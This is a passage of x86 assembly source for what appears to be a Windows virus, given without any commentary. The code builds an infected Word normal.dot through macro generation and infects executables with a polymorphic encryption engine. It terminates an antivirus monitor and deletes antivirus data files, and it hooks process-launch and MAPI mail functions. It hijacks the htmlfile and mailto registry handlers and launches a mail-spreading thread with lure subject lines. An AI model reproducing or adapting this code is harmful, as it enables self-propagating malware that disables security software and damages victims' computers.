call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
push eax
mov edi, eax
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
@@14:
lodsb
cmp al, '%'
jne @@18
lodsb
sub al, '0'
push ebx
push esi
movzx ecx, al
mov esi, ebx
@@15:
lodsb
test al, al
jnz @@15
loop @@15
@@16:
lodsb
test al, al
jz @@17
stosb
jmp @@16
@@17:
pop esi
pop ebx
mov al, 12h
org $-1
@@18:
stosb
lea eax, [ebx-4]
cmp esi, eax
jb @@14
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free mem macro code (unprocess)
mov ecx, edi
pop esi
sub ecx, esi
push ecx
mov [ebp+(ofs mm_on_off-ofs vcode)], esi
push 00000040h
push 00002000h+00001000h+00100000h
push 150*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
sub ecx, ecx
sub ebx, ebx
mov edi, eax
xchg eax, [esp]
xchg eax, ecx
add ecx, [ebp+(ofs mm_on_off-ofs vcode)];ecx=limit of macro template
mov by [ebp+(ofs mdeep-ofs vcode)], -1
@@19:
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
inc ah
cmp ah, 2
jne @@20
mov by [ebp+(ofs mdeep-ofs vcode)], 0
@@20:
cmp ah, 8
jne @@21
mov by [ebp+(ofs mdeep-ofs vcode)], -1
@@21:
cmp ah, 6
jne @@22
mov esi, [ebp+(ofs dbgscript-ofs vcode)]
push ecx
mov ecx, [ebp+(ofs dbgscript_size-ofs vcode)]
rep movsb
pop ecx
call MacroGarble
jmp @@19
@@22:
cmp ah, 9
je @@28
@@23:
cmp esi, ecx
jb @@24 ;all buffer scanned?
test ebx, ebx
jz @@19 ;nothing we were searching for exists
mov esi, [ebp+(ofs mm_on_off-ofs vcode)];it exists, but we skipped!
sub ebx, ebx
@@24:
lodsb
cmp al, ah
jne @@27 ;find line we're searching
inc ebx ;flag found
push eax
mov ax, 100
call random
cmp eax, 33 ;1/3
pop eax
jnb @@27 ;skip this time
mov by [esi-1], 9 ;flag as done
@@25:
lodsb
test al, al
jz @@26
stosb
cmp al, 10
jne @@25
call MacroGarble ;after CRLF, insert garbage
jmp @@25
@@26:
jmp @@23
@@27:
lodsb
test al, al
jnz @@27 ;seek till next line
jmp @@23
@@28:
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from macro code
mov eax, [esp] ;get buffer from stack
push eax
sub edi, eax
push edi
lea eax, [ebp+(ofs cokefile-ofs vcode)]
push eax
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
call WriteDump ;create/write new normal.dot
pop eax ;buffer
push 00004000h+00008000h
push 0
push eax
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from complete code
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs dbgscript-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from debug script
@@0:
sub ecx, ecx
pop dwo fs:[ecx]
pop ecx
sub eax, eax
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax
add al, '0'
mov by [ebp+(ofs dmt1-ofs vcode)], al
mov by [ebp+(ofs dmt2-ofs vcode)+7], al
mov by [ebp+(ofs outcmd-ofs vcode)+7], al
mov by [ebp+(ofs ssize-ofs vcode)+7], al
mov by [ebp+(ofs coda-ofs vcode)+7], al
mov by [ebp+(ofs dmt3-ofs vcode)+7], al
mov by [ebp+(ofs dmt4-ofs vcode)+7], al
mov by [ebp+(ofs dmt5-ofs vcode)+7], al
ret
MacroSpread endp
MacroGarble proc
push eax
push ecx
push esi
cmp by [ebp+(ofs mdeep-ofs vcode)], MAX_M_DEEP
jae @@0
inc by [ebp+(ofs mdeep-ofs vcode)]
mov eax, 4
call random
add eax, 2
mov ecx, eax
@@1:
push ecx
@@2:
mov eax, 16
call random
cmp al, 10
je @@remark
cmp al, 11
je @@for
cmp al, 12
je @@variables
cmp al, 13
je @@if
cmp al, 14
je @@10
jmp @@2
@@if:
mov eax, ' fI'
stosd
dec edi
call MakeVar
mov eax, ' = '
call random_f
jc @@3
dec ah
call random_f
jc @@3
inc ah
inc ah
@@3:
stosd
dec edi
call MakeVar
mov eax, 'ehT '
stosd
mov eax, 000a0d00h+'n'
stosd
dec edi
call MacroGarble
call @@4
db 'End If', 13, 10
@@4:
pop esi
movsd
movsd
jmp @@10
@@remark:
call random_f
jc @@5
mov al, "'"
stosb
jmp @@6
@@5:
mov eax, ' meR'
stosd
@@6:
call MakeVar
call MakeVar
@@7:
mov ax, 0a0dh
stosw
jmp @@10
@@variables:
call MakeVar
call random_f
jc @@string
mov eax, ' = '
stosd
dec edi
call MakeNumber
@@8:
jmp @@7
@@string:
call MakeVar
mov eax, ' = $'
stosd
mov al, '"'
stosb
call MakeVar
mov al, '"'
stosb
jmp @@8
@@for:
mov eax, ' roF'
stosd
push edi
call MakeVar
mov eax, ' = '
stosd
dec edi
call MakeNumber
mov eax, ' oT '
stosd
call MakeNumber
mov ax, 0a0dh
stosw
call MacroGarble
mov eax, 'txeN'
stosd
mov al, ' '
stosb
pop esi
@@9:
lodsb
cmp al, ' '
je @@8
stosb
jmp @@9
@@10:
pop ecx
dec ecx
jnz @@1
dec by [ebp+(ofs mdeep-ofs vcode)]
@@0:
pop esi
pop ecx
pop eax
ret
MacroGarble endp
MakeNumber proc
push ecx
push eax
mov eax, 2
call random
inc eax
mov ecx, eax
@@1:
mov eax, '9'-'0'
call random
add al, '0'
stosb
loop @@1
pop eax
pop ecx
ret
MakeNumber endp
include lz.inc
include macro.inc
update_address proc
push eax ecx
db 0b8h
addr dd 0 ;get address to eax
mov ecx, 4
@@1:
rol ax, 4
call mhex ;print hex digits
loop @@1
add dwo [ebp+(ofs addr-ofs vcode)], 10h ;update address
pop ecx eax
ret
update_address endp
mhex proc
push eax ebx
and eax, 01111b ;lower nibble
call $+21
db '0123456789ABCDEF'
pop ebx
xlat ;turn it in hex digit
stosb
pop ebx eax
ret
mhex endp
copy_line proc
push eax
@@0:
lodsb
or al, al
jz @@1 ;zero found, stop copy
stosb
jmp @@0
@@1:
pop eax
ret
copy_line endp
make_hex proc
push eax ecx esi
db 0b8h+6
iaddr dd 0 ;esi<->actual buffer position
inc dwo [ebp+(ofs iaddr-ofs vcode)] ;set next
mov al, 20h
stosb ;print space
lodsb
rol al, 4
call mhex ;print upper nibble
rol al, 4
call mhex ;print lower nibble
pop esi ecx eax
loop make_hex
ret
make_hex endp
script proc
cld
call debugmutator
mov dwo [ebp+(ofs addr-ofs vcode)], 0100h
mov [ebp+(ofs iaddr-ofs vcode)], esi ;set vars
lea esi, [ebp+(ofs intro-ofs vcode)]
call copy_line ;copy intro code
mov eax, 16
cdq
xchg eax, ecx
div ecx ;ecx=number of 16-bytes lines
mov ecx, eax ;edx=remainder for last line
@@0:
push ecx
lea esi, [ebp+(ofs outcmd-ofs vcode)]
call copy_line ;print
call update_address ;address
mov ecx, 16
call make_hex ;code to assemble
mov eax, 000A0D00h+'"'
stosd ;next line
dec edi
pop ecx
loop @@0
mov ecx, edx
jecxz @@1 ;no remainder?
lea esi, [ebp+(ofs outcmd-ofs vcode)]
call copy_line
call update_address ;make last line
call make_hex
mov eax, 000A0D00h+'"'
stosd
dec edi
sub wo [ebp+(ofs addr-ofs vcode)], 10h ;undo damage
@@1:
lea esi, [ebp+(ofs ssize-ofs vcode)]
call copy_line ;rcx
add wo [ebp+(ofs addr-ofs vcode)], dx
sub wo [ebp+(ofs addr-ofs vcode)], 100h
lea esi, [ebp+(ofs ssize-ofs vcode)]
call copy_line ;optimization!
sub edi, 6
call update_address ;set size
mov eax, 000A0D00h+'"'
stosd
dec edi
lea esi, [ebp+(ofs coda-ofs vcode)] ;copy final shit
call copy_line
ret
script endp
dbgscript dd 0
dbgscript_size dd 0
intro db 'Open "C:\COCAINE.SRC" For OutPut As '
dmt1 db '0', 13, 10
dmt2 db 'Print #0, "N C:\W32COKE.EX"',13,10,0
outcmd db 'Print #0, "E ',0
ssize db 'Print #0, "RCX"', 13, 10, 0
coda db 'Print #0, "W"', 13, 10
dmt3 db 'Print #0, "Q"', 13, 10
dmt4 db 'Print #0, ""', 13, 10
dmt5 db 'Close #0', 13, 10, 0
debugmutator proc
pushad
mov eax, 9
call random
inc eax
add by [ebp+(ofs dmt1-ofs vcode)], al
add by [ebp+(ofs dmt2-ofs vcode)+7], al
add by [ebp+(ofs outcmd-ofs vcode)+7], al
add by [ebp+(ofs ssize-ofs vcode)+7], al
add by [ebp+(ofs coda-ofs vcode)+7], al
add by [ebp+(ofs dmt3-ofs vcode)+7], al
add by [ebp+(ofs dmt4-ofs vcode)+7], al
add by [ebp+(ofs dmt5-ofs vcode)+7], al
popad
ret
debugmutator endp
macro_end equ this byte
MakeVar proc
push ecx
push eax
mov eax, 5
call random
add eax, 4
mov ecx, eax
@@1:
mov al, 'Z'-'A'
call random
add al, 'A'
call random_f
jc @@2
sub al, 'A'-'a'
@@2:
stosb
push ecx
push edi
call @@3
db 'AaEeIiOoUu'
@@3:
pop edi
mov ecx, 10
repne scasb
jecxz @@4
dec dwo [esp-1]
@@4:
pop edi
pop ecx
loop @@1
stosb
pop eax
pop ecx
ret
MakeVar endp
PatchIT proc
push esi
lea edi, [esi+ecx] ;destination
mov ecx, 4
push eax
mov esi, esp ;fake buffer in stack
call WriteMem
pop esi ;remove shit
pop esi
ret
PatchIT endp
_base dd 400000h
NUM_TOPICS EQU 8
topics equ this byte
dd ofs t0-ofs vcode
dd ofs t0-ofs vcode
dd ofs t0-ofs vcode
dd ofs t1-ofs vcode
dd ofs t2-ofs vcode
dd ofs t3-ofs vcode
dd ofs t4-ofs vcode
dd ofs t5-ofs vcode
t0 db '', 0
t1 db 'Kewl page!', 0
t2 db 'Improvement to your page', 0
t3 db 'Your page r0x0r!', 0
t4 db 'You must see this...', 0
t5 db 'Secret stuff!', 0
;ESI=Code to encrypt (Big enough; Swappable)
;EDI=Place to put code (Big enough; Swappable)
;ECX=Size of code to encrypt
;EAX=Delta entrypoint
;EDX=VA where code will run in host
;
;EDI=Final buffer
;ECX=Size
;EAX=New delta entrypoint
mutate proc
cld
push eax
call crypt_poly ;decrypt engine
mov [ebp+(ofs rva-ofs vcode)], edx
call random0
mov [ebp+(ofs cp_key-ofs vcode)], al ;next memory key
mov eax, [ebp+(ofs seed-ofs vcode)]
mov [ebp+(ofs pseed-ofs vcode)], eax
mov eax, 3
call random
push 2
pop ebx
add ebx, eax
or bl, 1
pop eax
@@1:
push ebx
call poly
xchg esi, edi ;permute bufferz
pop ebx
dec ebx
jnz @@1 ;next loop
xchg esi, edi
call crypt_poly ;encrypt poly engine after use
ret
mutate endp
crypt_poly proc
pushad
mov al, by [ebp+(ofs cp_key-ofs vcode)]
mov ecx, ofs egtable-ofs poly
lea esi, [ebp+(ofs poly-ofs vcode)]
@@1:
xor by [esi], al
inc esi
loop @@1
popad
ret
crypt_poly endp
rbuf db MAX_BRANCH*(128+4+4) dup (0)
vinit proc
mov esp, [esp+8]
call delta
lea eax, [ebp+(ofs seh-ofs vcode)]
mov [esp-4], eax
call init ;get api entries
jc @@3
sub eax, eax
mov ecx, MAX_SOCK+1
lea edi, [ebp+(ofs _socket-ofs vcode)]
rep stosd
mov [ebp+(ofs email_w-ofs vcode)], eax
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
mov [ebp+(ofs mdeep-ofs vcode)], al
lea eax, [ebp+(ofs kernel-ofs vcode)]
push eax
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
mov [ebp+(ofs K32-ofs vcode)], eax ;save kernel32 base
lea esi, [ebp+(ofs k32_names-ofs vcode)]
lea edi, [ebp+(ofs k32_address-ofs vcode)]
@@1:
lodsd
or eax, eax
jz @@2
add eax, ebp
call gpa_kernel32 ;get all api we want from k32
jc @@3
stosd
jmp @@1
db 0b9h
@@2:
lea eax, [ebp+(ofs user-ofs vcode)]
push eax
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
mov [ebp+(ofs U32-ofs vcode)], eax ;save user base
@@4:
lodsd
or eax, eax
jz @@5
mov ebx, [ebp+(ofs U32-ofs vcode)]
add eax, ebp
call gpa_custom ;get all api we want again
jc @@3
stosd
jmp @@4
db 0eah
@@5:
call @@adf
db 'ADVAPI32',0
@@adf:
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
call @@a11
db 'RegSetValueExA', 0
@@a11:
push eax
call @@aaa
db 'RegCreateKeyExA', 0
@@aaa:
push eax
call @@baa
db 'RegOpenKeyExA', 0
@@baa:
push eax
call @@caa
db 'RegQueryValueExA', 0
@@caa:
push eax
call @@d
db 'RegCloseKey', 0
@@d:
push eax ;retrieve all needed APIs
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegCloseKey-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegQueryValueEx-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegOpenKeyEx-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegCreateKeyEx-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _RegSetValueEx-ofs vcode)], eax
lea eax, [ebp+(ofs wavp-ofs vcode)]
sub ecx, ecx
push eax
push ecx
call [ebp+(ofs _FindWindowA-ofs vcode)]
or eax,eax
jz @@b
push ecx ;terminate AVPM using vg scheme
push ecx
push 16
push eax
call [ebp+(ofs _PostMessageA-ofs vcode)]
@@b:
lea eax, [ebp+(ofs shitfile-ofs vcode)]
push eax
call DeleteShitFile
call @@a1
db 'KERNEL.AVC', 0
@@a1:
call DeleteShitFile
call @@a2
db 'SIGN.DEF', 0
@@a2:
call DeleteShitFile
call @@a3
db 'FIND.DRV', 0
@@a3:
call DeleteShitFile
call @@a4
db 'NOD32.000', 0
@@a4:
call DeleteShitFile
call @@a5
db 'DSAVIO32.DLL', 0
@@a5:
call DeleteShitFile
call @@a6
db 'SCAN.DAT', 0
@@a6:
call DeleteShitFile
call @@a7
db 'VIRSCAN.DAT', 0
@@a7:
call DeleteShitFile
call @@a8
db 'C:\COCAINE.SRC', 0
@@a8:
call DeleteShitFile
lea ebx, [ebp+(ofs ancevsys-ofs vcode)]
push 83h
push ebx
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
lea esi, [ebp+(ofs current_time-ofs vcode)]
push esi
call [ebp+(ofs _GetSystemTime-ofs vcode)]
lea edi, [ebp+(ofs seed-ofs vcode)]
sub eax, eax
lodsw
lodsw ;init seed with dayofweek/day
movsd
push eax
sub al, MONTH_DELAY ;enough time passed?
jnc @@6
add al, 12
@@6:
cmp by [ebp+(ofs FunDate-ofs vcode)], al
mov al, 90h
je @@7
add al, 0c3h-90h ;nop/ret flip
@@7:
mov by [ebp+(ofs Payload-ofs vcode)], al
pop eax
add al, MONTH_DELAY
aam 12 ;set trigger date
mov by [ebp+(ofs FunDate-ofs vcode)], al
call random0
mov [ebp+(ofs key1-ofs vcode)], eax
call random0
mov [ebp+(ofs key2-ofs vcode)], eax
call macro_crypt ;decrypt macro stuff
call MacroSpread
call random0
add by [ebp+(ofs macro_key-ofs vcode)], al
call macro_crypt ;encrypt macro stuff
lea edx, [ebp+(ofs directory-ofs vcode)]
push edx
push MAX_PATH
call [ebp+(ofs _GetCurrentDirectoryA-ofs vcode)]
test eax, eax
jz @@10
call ProcessDir
@@10:
IF DIRECT EQ TRUE
lea edx, [ebp+(ofs directory-ofs vcode)]
push MAX_PATH
push edx
call [ebp+(ofs _GetWindowsDirectoryA-ofs vcode)]
test eax, eax
jz @@11
call ProcessDir
@@11:
; lea edx, [ebp+(ofs directory-ofs vcode)]
; push MAX_PATH
; push edx
; call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)]
; test eax, eax
; jz @@12
; call ProcessDir
; @@12:
ENDIF
mov esi, [ebp+(ofs _base-ofs vcode)]
@@a:
lea eax, [ebp+(ofs NewWinExec-ofs vcode)]
mov ecx, 0 ;hook per-process functionz
OldWinExec equ dwo $-4
jecxz @@8
call PatchIT
@@8:
lea eax, [ebp+(ofs NewCreateProcessA-ofs vcode)]
mov ecx, 0
OldCreateProcessA equ dwo $-4
jecxz @@9
call PatchIT
@@9:
lea eax, [ebp+(ofs NewMAPISendMail-ofs vcode)]
mov ecx, 0
OldMAPISendMail equ dwo $-4
jecxz @@92
call PatchIT
@@92:
lea eax, [ebp+(ofs NewGetProcAddress-ofs vcode)]
mov ecx, 0
OldGetProcAddress equ dwo $-4
jecxz @@93
call PatchIT
@@93:
call Payload
@@3:
call delta
cmp by [ebp+(ofs RestoreChunkz-ofs vcode)], FALSE
je @@aa
mov edx, MAX_BRANCH
lea esi, [ebp+(ofs rbuf-ofs vcode)]
@@rc1:
lodsd
add eax, [ebp+(ofs _base-ofs vcode)]
mov edi, eax
lodsd
mov ecx, eax
pushad
call WriteMem
popad
lea esi, [esi+ecx]
dec edx
jnz @@rc1
@@aa:
mov eax, 365
call random
cmp ax, 24
jne @sajsj
call GetList
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call DeleteShitFile
@sajsj:
call OpenAncev
jc @@jdjd
lea eax, [ebp+(ofs cokefile-ofs vcode)]
push eax
call DeleteShitFile
@@jdjd:
mov eax, NUM_TOPICS
call random
mov eax, [ebp+(ofs topics-ofs vcode)+(eax*4)]
add eax, ebp
mov [ebp+(ofs subject-ofs vcode)], eax
IF DIRECT EQ TRUE
inc dwo [ebp+(ofs what_key-ofs vcode)]
call @@2323
db 'SOFTWARE\Classes\htmlfile\shell\open\command', 0
@@2323:
pop eax
call ConsultKey
call FixKey
sub eax, eax
mov dwo [ebp+(ofs fsizel-ofs vcode)], eax
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax
call Infect
call @@2324
db 'SOFTWARE\Classes\mailto\shell\open\command', 0
@@2324:
pop eax
call ConsultKey
call FixKey
sub eax, eax
mov dwo [ebp+(ofs fsizel-ofs vcode)], eax
call Infect
dec dwo [ebp+(ofs what_key-ofs vcode)]
ENDIF
sub eax, eax
lea esi, [ebp+(ofs thread-ofs vcode)]
push esi
push eax
push ebp
lea esi, [ebp+(ofs MailThread-ofs vcode)]
push esi
push eax
push eax
call [ebp+(ofs _CreateThread-ofs vcode)]
call http_install
ret2host:
pop dwo fs:[0] ;restore seh frame
pop eax
jmp host ;jmp to host
vinit endp
host_entry equ dwo $-4
seh:
mov esp, [esp+8]
jmp ret2host
FixKey proc
push -2
pop ecx
mov edi, esi
@@0:
lodsb
cmp al, '"'
je @@1
test al, al
jz @@2
cmp al, ' '
jne @@3
cmp ecx, -2
je @@2
@@3:
stosb
jmp @@0
@@1:
inc ecx
jecxz @@2
jmp @@0
@@2:
sub eax, eax
stosb
ret
FixKey endp
cokefile db 'C:\COCAINE.SYS', 0
init proc
mov ecx, esp
call @@3
mov esp, [esp+8] ;fix stack
@@1:
call delta
stc ;signal error
mov cl, ?
org $-1
@@2:
clc ;signal success
pop dwo fs:[0] ;restore seh frame
sahf
add esp, 4
lahf
ret
db 081h
@@3:
sub eax, eax
push dwo fs:[eax]
mov fs:[eax], esp ;set new seh frame
mov eax, 0 ;is GetModuleHandleA imported?
OldGetModuleHandleA equ dwo $-4
test eax, eax
jz @@5
add eax, [ebp+(ofs _base-ofs vcode)]
lea edx, [ebp+(ofs kernel-ofs vcode)]
push edx
call [eax] ;use imported API to get
test eax, eax ;kernel32 module
jz @@5
mov edx, eax
jmp @@4
@@5:
mov eax, 077f00000h ;wNT base
push eax
call check_base
pop edx
jz @@4
mov eax, 077e00000h ;wNT 5 base
push eax
call check_base
pop edx
jz @@4
mov eax, 0bff70000h ;w9x base
push eax
call check_base
pop edx
jnz @@1
@@4:
mov eax, edx
mov ebx, eax
call delta
add eax, [eax+3ch]
cmp dwo [eax], 'EP'
jne @@1
add ebx, [eax+120] ;export table
lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)]
mov dwo [ebp+(ofs size_search-ofs vcode)], 17
mov [ebp+(ofs string_search-ofs vcode)], eax
call search_et ;get GetModuleHandle
jc @@1
mov [ebp+(ofs _GetModuleHandle-ofs vcode)], eax
lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)]
mov dwo [ebp+(ofs size_search-ofs vcode)], 15
mov [ebp+(ofs string_search-ofs vcode)], eax
call search_et ;get GetProcAddress
jc @@1
mov [ebp+(ofs _GetProcAddress-ofs vcode)], eax
jmp @@2
init endp
check_base proc
call @@1
mov esp, [esp+8]
call delta
cmp eax, esp
jmp @@0
@@1:
push dwo fs:[0]
mov fs:[0], esp
cmp wo [eax], 'ZM'
@@0:
pop dwo fs:[0]
pop eax
ret
check_base endp
search_et proc
mov eax, [ebx+32]
add eax, edx ;name table ptr
@@1:
mov esi, [eax]
or esi, esi
jz @@3 ;nul ptr
add esi, edx
mov edi, 0
string_search equ dwo $-4
mov ecx, 0
size_search equ dwo $-4
rep cmpsb ;the one we search?
jz @@2
add eax, 4
jmp @@1 ;check next api
@@2:
sub eax, [ebx+32]
sub eax, edx
shr eax, 1 ;div by 2
add eax, [ebx+36]
add eax, edx
movzx eax, wo [eax]
shl eax, 2 ;mul by 4
add eax, [ebx+28]
add eax, edx
mov eax, [eax]
add eax, edx
clc ;signal success
mov cl, 12h
org $-1
@@3:
stc ;signal error
ret
search_et endp
gpa_custom proc
push eax ;pointer to api wanted
push ebx ;module handle
jmp _gpa
db 66h
gpa_kernel32 proc
push eax
push dwo [ebp+(ofs K32-ofs vcode)]
_gpa:
call [ebp+(ofs _GetProcAddress-ofs vcode)]
or eax, eax
jz @@1
clc
mov cl, 12h
org $-1
@@1:
stc
ret
gpa_kernel32 endp
gpa_custom endp
MAX_RECURSION = 3
JMP_MAX = 16
MAX_SUBROUTINES = 16
flg record{
_key:1, ;1key isnt necessary ;4
_encriptor:2 ;XOR = 00
;NOT = 01
;ADD = 10
;SUB = 11 ;23
_bwd_fwd:1, ;0inc/1dec counter ;1
_direction:1, ;1backward/0forward ;0
}
pushf
db 09ah
poly proc ;encrypted in memory!
push esi
mov [ebp+(ofs entry-ofs vcode)], eax
mov [ebp+(ofs buffer-ofs vcode)], edi
mov [ebp+(ofs _size-ofs vcode)], ecx ;save entry values
sub eax, eax
mov [ebp+(ofs reg32-ofs vcode)], eax
mov [ebp+(ofs recurse-ofs vcode)], eax ;init internal vars
mov [ebp+(ofs lparm-ofs vcode)], eax
mov [ebp+(ofs lvars-ofs vcode)], eax
mov [ebp+(ofs subs_index-ofs vcode)], eax
mov [ebp+(ofs s_into-ofs vcode)], eax ;(dword)
call random0
and eax, mask _bwd_fwd + mask _direction + mask _encriptor
mov [ebp+(ofs flagz-ofs vcode)], eax ;set engine flagz
mov edx, eax
and edx, 11b
call random0
mov [ebp+(ofs key-ofs vcode)], al ;choose key
lea ebx, [ebp+(ofs crypt_table-ofs vcode)]
test edx, 10b
jz @@0
add ebx, 6 ;next table
@@0:
test edx, 01b
jz @@1
add ebx, 3 ;second choice
@@1:
mov ax, wo [ebx]
mov [ebp+(ofs _dec-ofs vcode)], ax
mov al, by [ebx+2]
mov [ebp+(ofs _enc-ofs vcode)], al
dec edx
jnz @@2
mov by [ebp+(ofs key-ofs vcode)], 0D0h ;not dont use key
bts dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key)
@@2:
jmp @@3 ;flush piq
@@3:
lodsb
_enc db 00
key db 00
stosb
loop @@3 ;crypt code
mov eax, 64
call random
mov ecx, eax
call _shit
mov [ebp+(ofs decriptor-ofs vcode)], edi;the decryptor starts here
call garble ;start of decryptor
lea ebx, [ebp+(ofs make_counter-ofs vcode)]
lea edx, [ebp+(ofs make_pointer-ofs vcode)]
call swapper ;set up start of poly decryptor
push edi ;loop start here
call garble
mov eax, [ebp+(ofs _dec-ofs vcode)]
mov edx, [ebp+(ofs p_reg-ofs vcode)]
or ah, dl
stosw ;store crypt instr
bt dwo [ebp+(ofs flagz-ofs vcode)], 6 ;(mask _key)
jc @@4
mov al, by [ebp+(ofs key-ofs vcode)]
stosb ;store key
@@4:
call garble
lea ebx, [ebp+(ofs upd_counter-ofs vcode)]
lea edx, [ebp+(ofs upd_pointer-ofs vcode)]
call swapper ;update counter and pointer
mov edx, [ebp+(ofs c_reg-ofs vcode)]
call random
jc @@5
call random
js @@7
mov eax, 0c00bh ;or reg, reg
jmp @@8
@@7:
mov eax, 0c085h ;test reg, reg
@@8:
mov ecx, edx
shl edx, 3
or ah, dl
or ah, cl
stosw
jmp @@6
@@5:
mov eax, 0f883h
or ah, dl
stosw ;cmp reg, 0
sub eax, eax
stosb
@@6:
mov ax, 850fh ;do conditional jump
stosw
pop edx
sub edx, edi ;delta distance
sub edx, 4
mov eax, edx
stosd ;jnz start_of_loop
mov dwo [ebp+(ofs reg32-ofs vcode)], 0
call garble
mov al, 0e9h
stosb ;jmp start
mov eax, edi
sub eax, [ebp+(ofs buffer-ofs vcode)]
sub eax, [ebp+(ofs entry-ofs vcode)]
add eax, 4
neg eax
stosd
call garble
call garble
mov ecx, [ebp+(ofs buffer-ofs vcode)] ;(this allows the calls to be
sub edi, ecx ;in forward/backward direction)
xchg edi, ecx
mov eax, [ebp+(ofs decriptor-ofs vcode)];calculate new entrypoint
sub eax, [ebp+(ofs buffer-ofs vcode)] ;relative to previous rva
pop esi
ret
poly endp
gar proc
call random0 ;get any reg
and eax, 0111b
cmp al, 4 ;esp never
je gar
ret
gar endp
get8free proc
mov eax, [ebp+(ofs reg32-ofs vcode)]
and eax, 01111b
cmp eax, 01111b
jne @@1
stc
ret
@@1:
call random0
and eax, 011b
bt [ebp+(ofs reg32-ofs vcode)], eax ;al,cl,dl,bl
jc get8free
call random_f
jc @@2
or al, 0100b ;ah,ch,dh,bh
@@2:
ret
get8free endp
get32reg proc ;get a free 32bit reg
call gar ;and mark it as used
bts [ebp+(ofs reg32-ofs vcode)], eax
jc get32reg
ret
get32reg endp
get32free proc ;get a free 32bit reg
call gar ;and NOT mark it as used
bt [ebp+(ofs reg32-ofs vcode)], eax
jc get32free
ret
get32free endp
swapper proc
call random0
jc @@1
xchg edx, ebx ;change order
@@1:
push edx
call ebx ;call 1st
call garble
pop edx
call edx ;call 2nd
call garble
ret
swapper endp
make_counter proc
call get32reg
mov [ebp+(ofs c_reg-ofs vcode)], eax
cmp al, 5 ;ebp complicate methodz
jne @@2
btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp
jmp make_counter
@@2:
or al, 0b8h
stosb
mov eax, [ebp+(ofs _size-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd
jnz @@1
neg eax ;counter will be INCed
@@1:
stosd
ret
make_counter endp
make_pointer proc
call get32reg
cmp al, 5 ;ebp complicate methodz
jne @@1
btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp
jmp make_pointer
@@1:
mov [ebp+(ofs p_reg-ofs vcode)], eax
or al, 0b8h
stosb
mov eax, [ebp+(ofs rva-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction
jz @@2
add eax, dwo [ebp+(ofs _size-ofs vcode)];pointer will be DECced
dec eax
@@2:
stosd
ret
make_pointer endp
upd_pointer:
mov eax, [ebp+(ofs p_reg-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction
jmp _update_reg
upd_counter:
mov eax, [ebp+(ofs c_reg-ofs vcode)]
test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd
_update_reg proc ;z=inc/nz=dec
mov ebx, 0140h ;inc
mov edx, 0c083h ;add
jz @@0
xor edx, 0c083h xor 0e883h ;sub
mov bl, 48h ;dec
@@0:
push eax
mov eax, 3
call random
or eax, eax
jz @@2 ;choose method
dec eax
jz @@1
xor edx, 0c083h xor 0e883h ;sub<->add
neg bh ;neg(1)
@@1:
pop ecx
mov eax, edx
or ah, cl ;patch reg
stosw
movzx eax, bh ;signal
jmp @@3
@@2:
pop ecx
xchg eax, ebx
or al, cl ;patch reg
@@3:
stosb
ret
_update_reg endp
garble proc
pushad
inc by [ebp+(ofs recurse-ofs vcode)]
cmp by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION
jae @@1
mov eax, 8
call random
add eax, 4
mov ecx, eax ;4-11 instructionz
@@0:
push ecx
lea esi, [ebp+(ofs gtable-ofs vcode)]
mov eax, (ofs egtable - ofs gtable)/4
call random
shl eax, 2
add esi, eax
lodsd
add eax, ebp
cmp by [ebp+(ofs lgarble-ofs vcode)], al
je @@2 ;same?
mov by [ebp+(ofs lgarble-ofs vcode)], al
call eax
@@2:
pop ecx
loop @@0
@@1:
dec by [ebp+(ofs recurse-ofs vcode)]
mov [esp], edi ;copy of edi in stack
popad
ret
garble endp
make_subs proc
cmp by [ebp+(ofs s_into-ofs vcode)], 0
jne @@1
cmp dwo [ebp+(ofs subs_index-ofs vcode)], MAX_SUBROUTINES
ja @@1
inc by [ebp+(ofs s_into-ofs vcode)] ;mark into
mov eax, [ebp+(ofs subs_index-ofs vcode)]
inc dwo [ebp+(ofs subs_index-ofs vcode)]
mov ecx, 6
cdq
mul ecx
lea esi, [ebp+eax+(ofs subs_table-ofs vcode)]
mov al, 0e9h
stosb
stosd
push edi ;[esp]-4 = skip_jmp
call garble
mov [esi], edi ;where sub is
mov eax, 5
call random ;number of paramz pushed
mov [esi.4], al ;by caller
mov eax, 5
call random ;number of local variables
mov [esi.5], al
test eax, eax ;if no local variables, then
jz @@0 ;dont alloc stack
